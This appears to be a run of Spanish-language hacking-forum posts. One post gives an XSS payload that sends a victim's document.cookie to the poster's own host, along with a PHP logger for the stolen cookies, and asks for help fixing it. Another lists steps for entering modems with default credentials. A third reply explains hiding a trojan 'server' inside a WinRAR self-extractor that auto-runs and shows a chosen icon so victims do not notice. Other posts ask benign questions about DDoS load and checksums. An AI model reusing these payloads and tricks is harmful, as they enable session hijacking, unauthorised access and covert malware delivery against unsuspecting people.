Mensajes

Lo que podés hacer es lo siguiente:

1) te conectas via telnet al puerto 80 (el puerto del http)
2) cuando te conectes das 2 enter y te va a pasar una respuesta con info que muchas veces si la pones en google te va a dar el modelo del modem.
3)buscar los usuarios contraseñas por defecto del modem
4) si logras entrar a la configuración mapeas unos puertos y empezas a ver que se puede hacer.

El problema no son las cookies, porque en algunas paginas de webhosting el codigo php recibe la cadena con las cookies perfectamente, pero en otras no. Pensé que podria ser un  problema común, pero igual muchas gracias sirdarckcat.

uso el siguiente codigo:

Código [Seleccionar] Expandir

<script>document.location='http://mipagina.com/archivo.php?x='+document.cookie;</script>



donde archivo.php contiene lo siguiente:

Código [Seleccionar] Expandir

   1.
      <?php
   2.
      $fp = fopen("datos.txt", "a+");
   3.
      $cookie = $_GET['x'];
   4.
      $salto = "\n-----------------------------\n";
   5.
      fwrite($fp,$salto);
   6.
      fwrite($fp,$cookie);
   7.
      fclose($fp);
   8.
      ?>

Pero si el archivo php está hospedado en un servidor funciona y en otro no. En el que no funciona le di todos los permisos a la carpeta (777) y a los archivos que contiene para que pueda almacenar los datos, pero solo guarda la linea punteada "$salto", porqué puede suceder esto?

cuando la pagina vulnerable se redirecciona, en la url se ve todo el contenido de la cookie por document.cookie, pero estos datos no son tomados para ser escritos

Yo no se si está bien poner esto, pero a mi me parece copadisimo el laburo que hiciste. Da gusto venir a este boliche  .

ah esa suma se llama checksum

http://es.wikipedia.org/wiki/Checksum

Bueno en realidad mi duda era porque google soportaba tantas peticiones sin padecer una denegación de servicio y la respuesta no fue mala, todo lo contrario y practicamente instantánea, pero no tengo muchos mas datos para buscar en google que "ancho de banda", no estudio informática ni nada por el estilo, no conozco sobre arquitectura de redes, solo tengo adicción a la programación desde muy chico.
De todos modos fue algo que me rajó la mente a mitad de madrugada pensando en las denegaciones que hacen con miles de computadoras zombies y pensaba que con solo miles y no millones de computadoras a google no lo afectaria en los mas mínimo (supuse eso)
Muchas gracias por la charla amena  Buen año para todos!

¿De que depende la cantidad de visitas que puede soportar un servidor? como saberlo?

Porque a la pagina del hacker.net la afectó el virus bush que hacia peticiones para provocar una denegación de servicio y a paginas como google que las visitan desde todo el mundo todo el tiempo no les pasa nada?

Porque una clase? En serio lo pregunto, si en un modulo simplón se pueden poner las funciones IniciarConsola (que retorne True si todo sale bien), EscribirEnConsola (que retorne el numero de caracteres escritos), LeerDesdeConsola (que guarda en un buffer el texto ingresado a la consola y retorne el numero de caracteres ingresados), TerminarConsola (retorno True o False y TituloDeConsola (puede ser solo una subrutina)

[pero como ustedes ya saben los server no pueden venir con dll apartes porque o si no se darian cuenta las personas que lo vallan a abrir]

Como seria eso? nunca lo hice. Gracias.

pero como ustedes ya saben los server no pueden venir con dll apartes porque o si no se darian cuenta las personas que lo vallan a abrir

si metes todo en un autoextraible de winrar (.exe) es un solo ejecutable y se descomprimen lo programas en la carpetas que quieras, e incluso esta la opcion de ejecutarse despues de extraerse y ponerle el icono que quieras.

http://foro.elhacker.net/printpage.html;topic=171025.0

ahi hay un ejemplo de un modulo .bas para sustituir el OCX, eso esta hacia al final, antes hay una introduccion a las apis.